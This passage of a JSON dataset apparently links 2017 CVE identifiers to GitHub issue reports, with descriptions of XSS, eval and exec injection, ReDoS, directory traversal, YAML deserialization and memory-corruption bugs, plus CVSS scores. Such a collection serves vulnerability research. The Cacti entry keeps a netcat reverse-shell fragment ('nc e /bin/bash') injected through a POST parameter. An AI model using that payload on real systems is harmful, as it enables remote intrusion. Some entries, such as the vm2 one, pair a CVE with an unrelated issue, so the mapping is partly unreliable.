  10031. "description": "Cross Site Scripting vulnerability in online reader!. I accidentally discovered that the online reader of APITAG is vulnerable to Cross Site Scripting (XSS) URLTAG . If HTML or Javascript code is not put in backticks to mark it as a code block (e.g. APITAG ) it will actually be executed. This is a severe security issue and should be addressed immediately. I added a harmless Javascript alert script to a page in my book for you to verify the issue: FILETAG > Disclaimer: I have reported this issue some weeks before via email and Slack but neither received a response nor was the issue fixed silently.",
  10032. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10033. "severity": "MEDIUM",
  10034. "baseScore": 6.1,
  10035. "impactScore": 2.7,
  10036. "exploitabilityScore": 2.8
  10037. },
  10038. {
  10039. "CVE_ID": "CVE-2017-16020",
  10040. "Issue_Url_old": "https://github.com/notduncansmith/summit/issues/23",
  10041. "Issue_Url_new": "https://github.com/notduncansmith/summit/issues/23",
  10042. "Repo_new": "notduncansmith/summit",
  10043. "Issue_Created_At": "2016-04-08T13:07:34Z",
  10044. "description": "Unsafe use of eval. The following use of eval in PATHTAG is dangerous: ERRORTAG An attacker can use a malicious payload instead of a valid collection name to inject arbitrary commands. I suggest one of the following options: refactoring out eval, use adhoc regex validation or use a heavyweight sanitization package like URLTAG",
  10045. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10046. "severity": "CRITICAL",
  10047. "baseScore": 9.8,
  10048. "impactScore": 5.9,
  10049. "exploitabilityScore": 3.9
  10050. },
  10051. {
  10052. "CVE_ID": "CVE-2017-16021",
  10053. "Issue_Url_old": "https://github.com/garycourt/uri-js/issues/12",
  10054. "Issue_Url_new": "https://github.com/garycourt/uri-js/issues/12",
  10055. "Repo_new": "garycourt/uri-js",
  10056. "Issue_Created_At": "2016-03-15T07:38:00Z",
  10057. "description": "parse hangs on some long urls. During penetration tests with Burp Suite URLTAG we found that our app hangs on some requests. It turned out that uri js parse hangs on some long urls. Here is a simple script to reproduce it: CODETAG Here is the result on my machine ERRORTAG Notice how the time increases exponentially about NUMBERTAG for each new segment. So with long enough URL parse just hangs at NUMBERTAG CPU. It seems uri js uses a generated regex which in my case appears to be this: CODETAG",
  10058. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  10059. "severity": "MEDIUM",
  10060. "baseScore": 6.5,
  10061. "impactScore": 3.6,
  10062. "exploitabilityScore": 2.8
  10063. },
  10064. {
  10065. "CVE_ID": "CVE-2017-16023",
  10066. "Issue_Url_old": "https://github.com/sindresorhus/decamelize/issues/5",
  10067. "Issue_Url_new": "https://github.com/sindresorhus/decamelize/issues/5",
  10068. "Repo_new": "sindresorhus/decamelize",
  10069. "Issue_Created_At": "2015-12-23T00:56:07Z",
  10070. "description": "if the separator is |, this function does not work. You seem to have fallen prey to a \"regular expression injection attack\" :(.",
  10071. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10072. "severity": "HIGH",
  10073. "baseScore": 7.5,
  10074. "impactScore": 3.6,
  10075. "exploitabilityScore": 3.9
  10076. },
  10077. {
  10078. "CVE_ID": "CVE-2017-16024",
  10079. "Issue_Url_old": "https://github.com/gvarsanyi/sync-exec/issues/17",
  10080. "Issue_Url_new": "https://github.com/gvarsanyi/sync-exec/issues/17",
  10081. "Repo_new": "gvarsanyi/sync-exec",
  10082. "Issue_Created_At": "2016-01-24T07:00:02Z",
  10083. "description": "Insecure temporary directores. The module uses temporary directories but creates them in an insecure way. Besides general issues related to making of tmp files, the implementation in PATHTAG does not handle errors. The variable created is set to true even if the directory already exists and belong to another user. It seems that errors should be handled by callback, but it is inconsistent with synchronous usage of fs.mkdir. Some node modules were suggested in response to the stackoverflow question \"nodejs Temporary file name [closed]\" URLTAG More details related to the issue is given in APITAG temporary files securely\" URLTAG This kind of vulnerabilities is discussed in general in FILETAG",
  10084. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  10085. "severity": "MEDIUM",
  10086. "baseScore": 6.5,
  10087. "impactScore": 3.6,
  10088. "exploitabilityScore": 2.8
  10089. },
  10090. {
  10091. "CVE_ID": "CVE-2017-16025",
  10092. "Issue_Url_old": "https://github.com/hapijs/nes/issues/171",
  10093. "Issue_Url_new": "https://github.com/hapijs/nes/issues/171",
  10094. "Repo_new": "hapijs/nes",
  10095. "Issue_Created_At": "2017-01-27T11:31:54Z",
  10096. "description": "server falls with bad cookie header. Node server falls. I think problem is in request without or bad cookie header. PATHTAG const auth = APITAG ^ ERRORTAG Cannot read property 'nes' of null at PATHTAG at APITAG [as parse] ( PATHTAG ) at APITAG ( PATHTAG ) at new APITAG ( PATHTAG ) at APITAG [as _add] ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG APITAG at APITAG APITAG at PATHTAG at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG ( PATHTAG ) at APITAG APITAG at APITAG APITAG",
  10097. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10098. "severity": "MEDIUM",
  10099. "baseScore": 5.9,
  10100. "impactScore": 3.6,
  10101. "exploitabilityScore": 2.2
  10102. },
  10103. {
  10104. "CVE_ID": "CVE-2017-16026",
  10105. "Issue_Url_old": "https://github.com/request/request/issues/1904",
  10106. "Issue_Url_new": "https://github.com/request/request/issues/1904",
  10107. "Repo_new": "request/request",
  10108. "Issue_Created_At": "2015-11-16T11:42:12Z",
  10109. "description": "first argument must be a string of Buffer. Hi, I was running some code and got this error message: ERRORTAG Funny thing is, that if I replace the current version of request module with an older one NUMBERTAG PATHTAG ), according to changelog), everything works just fine. The code that causes this error is this: ERRORTAG",
  10110. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10111. "severity": "MEDIUM",
  10112. "baseScore": 5.9,
  10113. "impactScore": 3.6,
  10114. "exploitabilityScore": 2.2
  10115. },
  10116. {
  10117. "CVE_ID": "CVE-2017-16029",
  10118. "Issue_Url_old": "https://github.com/henrytseng/hostr/issues/8",
  10119. "Issue_Url_new": "https://github.com/henrytseng/hostr/issues/8",
  10120. "Repo_new": "henrytseng/hostr",
  10121. "Issue_Created_At": "2016-12-11T12:22:18Z",
  10122. "description": "A directory traversal issue. This package is vulnerable to directory traversal. An attacker can provide input such as APITAG to read files outside of the specified working directory.",
  10123. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10124. "severity": "HIGH",
  10125. "baseScore": 7.5,
  10126. "impactScore": 3.6,
  10127. "exploitabilityScore": 3.9
  10128. },
  10129. {
  10130. "CVE_ID": "CVE-2017-16038",
  10131. "Issue_Url_old": "https://github.com/shy2850/node-server/issues/10",
  10132. "Issue_Url_new": "https://github.com/shy2850/node-server/issues/10",
  10133. "Repo_new": "shy2850/node-server",
  10134. "Issue_Created_At": "2017-04-18T00:29:41Z",
  10135. "description": "Directory Traversal. First of all, this is an awesome package with lots of functionalities. It just has a directory traversal issue, which can be fixed by adding some filtering on the requested url path. To exploit the vulnerability, I can just send a web request say: APITAG to browse and retrieve any file on the hosting server. Notice: the above url does not work with wget or a browser. Try it by using APITAG in a FILETAG program.",
  10136. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10137. "severity": "HIGH",
  10138. "baseScore": 7.5,
  10139. "impactScore": 3.6,
  10140. "exploitabilityScore": 3.9
  10141. },
  10142. {
  10143. "CVE_ID": "CVE-2017-16042",
  10144. "Issue_Url_old": "https://github.com/tj/node-growl/issues/60",
  10145. "Issue_Url_new": "https://github.com/tj/node-growl/issues/60",
  10146. "Repo_new": "tj/node-growl",
  10147. "Issue_Created_At": "2016-07-21T12:47:55Z",
  10148. "description": "Unsafe use of exec. The module does not sanitize the input before passing it to exec. Therefore the following code snippets may produce unexpected results for some of the users of the library: APITAG Use a sanitization npm module like shell quote or replace exec with spawn!",
  10149. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10150. "severity": "CRITICAL",
  10151. "baseScore": 9.8,
  10152. "impactScore": 5.9,
  10153. "exploitabilityScore": 3.9
  10154. },
  10155. {
  10156. "CVE_ID": "CVE-2017-16088",
  10157. "Issue_Url_old": "https://github.com/patriksimek/vm2/issues/59",
  10158. "Issue_Url_new": "https://github.com/patriksimek/vm2/issues/59",
  10159. "Repo_new": "patriksimek/vm2",
  10160. "Issue_Created_At": "2017-03-02T14:53:47Z",
  10161. "description": "Advantages over the native VM module. Hello there :) Just wanted to know if there are clear advantages using vm2 over node's native VM module tried to look for it in the readme but couldnt find anything. I'm using vm on node NUMBERTAG and was wondering if I should potentially look at vm2 if it fixes / handles specific use cases. Cheers!",
  10162. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  10163. "severity": "CRITICAL",
  10164. "baseScore": 10.0,
  10165. "impactScore": 6.0,
  10166. "exploitabilityScore": 3.9
  10167. },
  10168. {
  10169. "CVE_ID": "CVE-2017-16088",
  10170. "Issue_Url_old": "https://github.com/hacksparrow/safe-eval/issues/5",
  10171. "Issue_Url_new": "https://github.com/hacksparrow/safe-eval/issues/5",
  10172. "Repo_new": "hacksparrow/safe-eval",
  10173. "Issue_Created_At": "2017-03-04T00:31:14Z",
  10174. "description": "Securrity issue: node's VM module doesn't prevent you from accessing the node stdlib. As simple as: APITAG This should be mentioned in the readme, as the VM isn't so safe and people might instead think this prevents any kind of attack :) Ref: URLTAG",
  10175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  10176. "severity": "CRITICAL",
  10177. "baseScore": 10.0,
  10178. "impactScore": 6.0,
  10179. "exploitabilityScore": 3.9
  10180. },
  10181. {
  10182. "CVE_ID": "CVE-2017-16098",
  10183. "Issue_Url_old": "https://github.com/node-modules/charset/issues/10",
  10184. "Issue_Url_new": "https://github.com/node-modules/charset/issues/10",
  10185. "Repo_new": "node-modules/charset",
  10186. "Issue_Created_At": "2017-09-05T17:52:25Z",
  10187. "description": "Vulnerable Regular Expression. The following regular expression used for parsing the HTTP header is vulnerable to APITAG APITAG The slowdown is moderate: for NUMBERTAG characters around NUMBERTAG seconds matching time. I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10189. "severity": "HIGH",
  10190. "baseScore": 7.5,
  10191. "impactScore": 3.6,
  10192. "exploitabilityScore": 3.9
  10193. },
  10194. {
  10195. "CVE_ID": "CVE-2017-16099",
  10196. "Issue_Url_old": "https://github.com/blakeembrey/no-case/issues/17",
  10197. "Issue_Url_new": "https://github.com/blakeembrey/no-case/issues/17",
  10198. "Repo_new": "blakeembrey/no-case",
  10199. "Issue_Created_At": "2017-09-08T08:57:26Z",
  10200. "description": "Vulnerable Regular Expression. The regular expression in FILETAG , used to transform the input string is vulnerable to APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10201. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10202. "severity": "HIGH",
  10203. "baseScore": 7.5,
  10204. "impactScore": 3.6,
  10205. "exploitabilityScore": 3.9
  10206. },
  10207. {
  10208. "CVE_ID": "CVE-2017-16100",
  10209. "Issue_Url_old": "https://github.com/skoranga/node-dns-sync/issues/5",
  10210. "Issue_Url_new": "https://github.com/skoranga/node-dns-sync/issues/5",
  10211. "Repo_new": "skoranga/node-dns-sync",
  10212. "Issue_Created_At": "2017-09-05T12:56:04Z",
  10213. "description": "Vulnerable Regular Expression. The following regular expression introduced for validating the hostname is vulnerable to APITAG APITAG The slowdown is very serious: for NUMBERTAG characters around NUMBERTAG seconds matching time. I would suggest one of the following: remove the regex, limit the number of characters that can be matched by the repetition, limit the input size. Moreover, the regular expression allows validation bypassing and hence arbitrary command execution!!! If needed, I can provide an actual example showing the slowdown or the validation bypass.",
  10214. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10215. "severity": "CRITICAL",
  10216. "baseScore": 9.8,
  10217. "impactScore": 5.9,
  10218. "exploitabilityScore": 3.9
  10219. },
  10220. {
  10221. "CVE_ID": "CVE-2017-16113",
  10222. "Issue_Url_old": "https://github.com/get/parsejson/issues/4",
  10223. "Issue_Url_new": "https://github.com/galkn/parsejson/issues/4",
  10224. "Repo_new": "galkn/parsejson",
  10225. "Issue_Created_At": "2017-09-08T09:08:19Z",
  10226. "description": "Vulnerable Regular Expression. The following regular expression used in parsing the JSON file is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10227. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10228. "severity": "HIGH",
  10229. "baseScore": 7.5,
  10230. "impactScore": 3.6,
  10231. "exploitabilityScore": 3.9
  10232. },
  10233. {
  10234. "CVE_ID": "CVE-2017-16114",
  10235. "Issue_Url_old": "https://github.com/chjj/marked/issues/937",
  10236. "Issue_Url_new": "https://github.com/markedjs/marked/issues/937",
  10237. "Repo_new": "markedjs/marked",
  10238. "Issue_Created_At": "2017-09-07T13:35:28Z",
  10239. "description": "Vulnerable Regular Expression. The following regular expression used in parsing the input markdown content is vulnerable to APITAG APITAG The slowdown is very serious (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10240. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10241. "severity": "HIGH",
  10242. "baseScore": 7.5,
  10243. "impactScore": 3.6,
  10244. "exploitabilityScore": 3.9
  10245. },
  10246. {
  10247. "CVE_ID": "CVE-2017-16115",
  10248. "Issue_Url_old": "https://github.com/indexzero/TimeSpan.js/issues/10",
  10249. "Issue_Url_new": "https://github.com/indexzero/timespan.js/issues/10",
  10250. "Repo_new": "indexzero/timespan.js",
  10251. "Issue_Created_At": "2017-09-07T09:43:18Z",
  10252. "description": "Vulnerable Regular Expressions. The following regular expressions used for parsing the dates are vulnerable to APITAG APITAG The slowdown is relatively large when combining the slowdown produced by all the regexs (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10254. "severity": "HIGH",
  10255. "baseScore": 7.5,
  10256. "impactScore": 3.6,
  10257. "exploitabilityScore": 3.9
  10258. },
  10259. {
  10260. "CVE_ID": "CVE-2017-16116",
  10261. "Issue_Url_old": "https://github.com/jprichardson/string.js/issues/212",
  10262. "Issue_Url_new": "https://github.com/jprichardson/string.js/issues/212",
  10263. "Repo_new": "jprichardson/string.js",
  10264. "Issue_Created_At": "2017-09-06T14:45:41Z",
  10265. "description": "Vulnerable Regular Expressions. The following regular expressions used in underscore and APITAG methods are vulnerable to APITAG APITAG The slowdown is moderately low (for NUMBERTAG characters around NUMBERTAG seconds matching time). I would suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10267. "severity": "HIGH",
  10268. "baseScore": 7.5,
  10269. "impactScore": 3.6,
  10270. "exploitabilityScore": 3.9
  10271. },
  10272. {
  10273. "CVE_ID": "CVE-2017-16117",
  10274. "Issue_Url_old": "https://github.com/dodo/node-slug/issues/82",
  10275. "Issue_Url_new": "https://github.com/dodo/node-slug/issues/82",
  10276. "Repo_new": "dodo/node-slug",
  10277. "Issue_Created_At": "2017-09-06T14:08:19Z",
  10278. "description": "Vulnerable Regular Expression. The following regular expression used in parsing the input string is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10279. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10280. "severity": "HIGH",
  10281. "baseScore": 7.5,
  10282. "impactScore": 3.6,
  10283. "exploitabilityScore": 3.9
  10284. },
  10285. {
  10286. "CVE_ID": "CVE-2017-16129",
  10287. "Issue_Url_old": "https://github.com/visionmedia/superagent/issues/1259",
  10288. "Issue_Url_new": "https://github.com/ladjs/superagent/issues/1259",
  10289. "Repo_new": "ladjs/superagent",
  10290. "Issue_Created_At": "2017-08-07T17:15:56Z",
  10291. "description": "Limit maximum response size. Superagent buffers and uncompresses responses in memory. Malicious server could send extremely large response causing superagent to use excessive amounts of memory. I suggest adding a way to set a maximum response size, and have a default limit set.",
  10292. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10293. "severity": "MEDIUM",
  10294. "baseScore": 5.9,
  10295. "impactScore": 3.6,
  10296. "exploitabilityScore": 2.2
  10297. },
  10298. {
  10299. "CVE_ID": "CVE-2017-16137",
  10300. "Issue_Url_old": "https://github.com/visionmedia/debug/issues/501",
  10301. "Issue_Url_new": "https://github.com/debug-js/debug/issues/501",
  10302. "Repo_new": "debug-js/debug",
  10303. "Issue_Created_At": "2017-09-05T11:59:41Z",
  10304. "description": "Vulnerable Regular Expression. The following regular expression used in the \"o\" formatter is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10305. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  10306. "severity": "MEDIUM",
  10307. "baseScore": 5.3,
  10308. "impactScore": 1.4,
  10309. "exploitabilityScore": 3.9
  10310. },
  10311. {
  10312. "CVE_ID": "CVE-2017-16138",
  10313. "Issue_Url_old": "https://github.com/broofa/node-mime/issues/167",
  10314. "Issue_Url_new": "https://github.com/broofa/mime/issues/167",
  10315. "Repo_new": "broofa/mime",
  10316. "Issue_Created_At": "2017-09-05T12:20:24Z",
  10317. "description": "Vulnerable Regular Expression. The following regular expression used in the mime lookup is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. If needed, I can provide an actual example showing the slowdown.",
  10318. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10319. "severity": "HIGH",
  10320. "baseScore": 7.5,
  10321. "impactScore": 3.6,
  10322. "exploitabilityScore": 3.9
  10323. },
  10324. {
  10325. "CVE_ID": "CVE-2017-16229",
  10326. "Issue_Url_old": "https://github.com/ohler55/ox/issues/195",
  10327. "Issue_Url_new": "https://github.com/ohler55/ox/issues/195",
  10328. "Repo_new": "ohler55/ox",
  10329. "Issue_Created_At": "2017-10-29T22:44:33Z",
  10330. "description": "Stack buffer overlfow. Tested on ruby NUMBERTAG POC crash ( APITAG ): CODETAG Input file that causes the crash: URLTAG Launch: APITAG Output: ERRORTAG Backtrace: ERRORTAG Output with APITAG (ASAN): ERRORTAG",
  10331. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10332. "severity": "MEDIUM",
  10333. "baseScore": 5.5,
  10334. "impactScore": 3.6,
  10335. "exploitabilityScore": 1.8
  10336. },
  10337. {
  10338. "CVE_ID": "CVE-2017-16357",
  10339. "Issue_Url_old": "https://github.com/radare/radare2/issues/8742",
  10340. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8742",
  10341. "Repo_new": "radareorg/radare2",
  10342. "Issue_Created_At": "2017-10-26T03:52:15Z",
  10343. "description": "Memory corruption on NUMBERTAG bit system. A memory corruption issue was found in radare2 on NUMBERTAG bit linux system when handling crafted ELF file. Build information: CODETAG Backtrace: ERRORTAG Enviroment: ERRORTAG A POC file has been attached to reproduce this issue. FILETAG",
  10344. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10345. "severity": "HIGH",
  10346. "baseScore": 7.8,
  10347. "impactScore": 5.9,
  10348. "exploitabilityScore": 1.8
  10349. },
  10350. {
  10351. "CVE_ID": "CVE-2017-16358",
  10352. "Issue_Url_old": "https://github.com/radare/radare2/issues/8748",
  10353. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8748",
  10354. "Repo_new": "radareorg/radare2",
  10355. "Issue_Created_At": "2017-10-27T06:59:04Z",
  10356. "description": "Address sanitizer reports heap buffer overflow on NUMBERTAG bit linux system. Address sanitizer reports heap buffer overflow on NUMBERTAG bit linux system when radare2 handles crafted data. My enviroment: ERRORTAG Radare2 build information: CODETAG ASAN reports on heap buffer overflow: ERRORTAG",
  10357. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10358. "severity": "HIGH",
  10359. "baseScore": 7.8,
  10360. "impactScore": 5.9,
  10361. "exploitabilityScore": 1.8
  10362. },
  10363. {
  10364. "CVE_ID": "CVE-2017-16359",
  10365. "Issue_Url_old": "https://github.com/radare/radare2/issues/8764",
  10366. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8764",
  10367. "Repo_new": "radareorg/radare2",
  10368. "Issue_Created_At": "2017-10-31T12:01:14Z",
  10369. "description": "Crash in ELF version parse. This issue looks like NUMBERTAG but it should be a different one. ERRORTAG Build information and enviroment: ERRORTAG",
  10370. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10371. "severity": "MEDIUM",
  10372. "baseScore": 5.5,
  10373. "impactScore": 3.6,
  10374. "exploitabilityScore": 1.8
  10375. },
  10376. {
  10377. "CVE_ID": "CVE-2017-16516",
  10378. "Issue_Url_old": "https://github.com/brianmario/yajl-ruby/issues/176",
  10379. "Issue_Url_new": "https://github.com/brianmario/yajl-ruby/issues/176",
  10380. "Repo_new": "brianmario/yajl-ruby",
  10381. "Issue_Created_At": "2017-11-02T02:22:45Z",
  10382. "description": "SIGABRT process aborted. APITAG APITAG File passed as input: APITAG Output: ERRORTAG",
  10383. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  10384. "severity": "HIGH",
  10385. "baseScore": 7.5,
  10386. "impactScore": 3.6,
  10387. "exploitabilityScore": 3.9
  10388. },
  10389. {
  10390. "CVE_ID": "CVE-2017-16546",
  10391. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/851",
  10392. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/851",
  10393. "Repo_new": "imagemagick/imagemagick",
  10394. "Issue_Created_At": "2017-11-04T06:27:48Z",
  10395. "description": "Heap Allocation errors, uninitialized integers used to allocate memory as well as conditional jumps depending on uninitialized values, while feeding a malformed WPG File. Description There seems to be a number of heap Allocation errors, uninitialized integers used to allocate memory as well as conditional jumps depending on uninitialized values, while running a verbose identify on a malformed image file. All of these conditions can be triggered by using a single WPG file. Steps to Reproduce This occurs while running ./magick identify verbose %file% on a malformed WPG file. FILETAG The hexdump of the input file is: CODETAG The Memcheck output is huge, I'm sharing it as a txt file attached with the report. FILETAG However some of the relevant parts are: ERRORTAG ERRORTAG ERRORTAG System Configuration Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC Delegates (built in): OS: Ubuntu NUMBERTAG Compiler: clang version NUMBERTAG PATHTAG ) / gcc version NUMBERTAG APITAG NUMBERTAG ubuntu3) Target NUMBERTAG pc linux gnu",
  10396. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10397. "severity": "HIGH",
  10398. "baseScore": 8.8,
  10399. "impactScore": 5.9,
  10400. "exploitabilityScore": 2.8
  10401. },
  10402. {
  10403. "CVE_ID": "CVE-2017-16615",
  10404. "Issue_Url_old": "https://github.com/thanethomson/MLAlchemy/issues/1",
  10405. "Issue_Url_new": "https://github.com/thanethomson/mlalchemy/issues/1",
  10406. "Repo_new": "thanethomson/mlalchemy",
  10407. "Issue_Created_At": "2017-11-07T08:26:15Z",
  10408. "description": "parse_yaml_query method is vulnerable. from mlalchemy import parse_yaml_query parse_yaml_query( PATHTAG APITAG Hi, there is a vulnerability in parse_yaml_query method in parser.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10409. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10410. "severity": "CRITICAL",
  10411. "baseScore": 9.8,
  10412. "impactScore": 5.9,
  10413. "exploitabilityScore": 3.9
  10414. },
  10415. {
  10416. "CVE_ID": "CVE-2017-16616",
  10417. "Issue_Url_old": "https://github.com/Stranger6667/pyanyapi/issues/41",
  10418. "Issue_Url_new": "https://github.com/stranger6667/pyanyapi/issues/41",
  10419. "Repo_new": "stranger6667/pyanyapi",
  10420. "Issue_Created_At": "2017-11-07T08:31:08Z",
  10421. "description": "APITAG method is vulnerable . from pyanyapi import APITAG APITAG 'container > APITAG PATHTAG APITAG Hi, there is a vulnerability in APITAG method in Interfaces.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10422. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10423. "severity": "CRITICAL",
  10424. "baseScore": 9.8,
  10425. "impactScore": 5.9,
  10426. "exploitabilityScore": 3.9
  10427. },
  10428. {
  10429. "CVE_ID": "CVE-2017-16618",
  10430. "Issue_Url_old": "https://github.com/tadashi-aikawa/owlmixin/issues/12",
  10431. "Issue_Url_new": "https://github.com/tadashi-aikawa/owlmixin/issues/12",
  10432. "Repo_new": "tadashi-aikawa/owlmixin",
  10433. "Issue_Created_At": "2017-11-07T08:28:51Z",
  10434. "description": "load_yaml and load_yamlf methods is vulnerable. from owlmixin import util APITAG PATHTAG APITAG APITAG NUMBERTAG PATHTAG APITAG Hi, there is a vulnerability in load_yaml and load_yamlf methods in util.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10435. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10436. "severity": "CRITICAL",
  10437. "baseScore": 9.8,
  10438. "impactScore": 5.9,
  10439. "exploitabilityScore": 3.9
  10440. },
  10441. {
  10442. "CVE_ID": "CVE-2017-16641",
  10443. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1057",
  10444. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1057",
  10445. "Repo_new": "cacti/cacti",
  10446. "Issue_Created_At": "2017-11-01T19:38:32Z",
  10447. "description": "Critical vuln in cacti NUMBERTAG We (worlak2 and cibvetr2) found RCE vuln with black box fuzzing. APITAG APITAG in POST parameter path_rrdtool > _ nc e /bin/bash APITAG NUMBERTAG FILETAG NUMBERTAG Ater NUMBERTAG minutes we have backconnect shell FILETAG It\u2019s triggered after execute FILETAG in process. We think that because _$command_ not filtered in PATHTAG With regards worlak2 and cibvetr2",
  10448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  10449. "severity": "HIGH",
  10450. "baseScore": 7.2,
  10451. "impactScore": 5.9,
  10452. "exploitabilityScore": 1.2
  10453. },
  10454. {
  10455. "CVE_ID": "CVE-2017-16651",
  10456. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6026",
  10457. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6026",
  10458. "Repo_new": "roundcube/roundcubemail",
  10459. "Issue_Created_At": "2017-11-06T10:45:29Z",
  10460. "description": "File Disclosure Vulnerability. There is a zero day file disclosure vulnerability in the latest version of roundcube webmail which currently is being exploited by hackers to read roundcube's configuration files and steal its database credentials. It requires a valid username/password to login to a roundcube installation. I don't know how exactly should I report the details of this bug. Is there a proper way to privately send the details to roundcube's developers? Can I send the details to hello(at)roundcube(dot)net?",
  10461. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10462. "severity": "HIGH",
  10463. "baseScore": 7.8,
  10464. "impactScore": 5.9,
  10465. "exploitabilityScore": 1.8
  10466. },
  10467. {
  10468. "CVE_ID": "CVE-2017-16660",
  10469. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1066",
  10470. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1066",
  10471. "Repo_new": "cacti/cacti",
  10472. "Issue_Created_At": "2017-11-07T03:49:22Z",
